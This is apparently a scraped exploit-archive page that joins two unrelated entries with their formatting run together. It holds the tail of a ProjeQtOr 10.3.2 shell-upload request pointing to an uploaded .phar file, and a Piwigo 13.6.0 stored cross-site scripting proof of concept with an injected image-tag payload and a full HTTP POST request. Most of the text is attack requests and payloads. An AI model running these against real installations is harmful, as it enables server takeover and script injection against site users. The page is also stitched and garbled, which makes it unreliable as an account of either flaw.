Content-Disposition: form-data; name="attachmentDescription"

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentPrivacy"

1  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="uploadType"

html5  
------WebKitFormBoundaryY0bpJaQzcvQberWR--

visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar

ProjeQtOr Project Management System 10.3.2 Shell Upload

Piwigo version 13.6.0 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)Application: PiwigoVersion: 13.6.0 Bugs:  Stored XSSTechnology: PHPVendor URL: https://piwigo.org/Software Link: https://piwigo.org/get-piwigoDate of found: 18.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1.After uploading the image, we write <img%20src=x%20onerror=alert(4)> instead of the tag(keyword) while editing the image)payload: <img%20src=x%20onerror=alert(4)>POST /piwigo/admin.php?page=photo-9 HTTP/1.1Host: localhostContent-Length: 159Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/piwigo/admin.php?page=photo-9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380feConnection: closename=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=<img%20src=x%20onerror=alert(3)>&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings

Tag

#webkit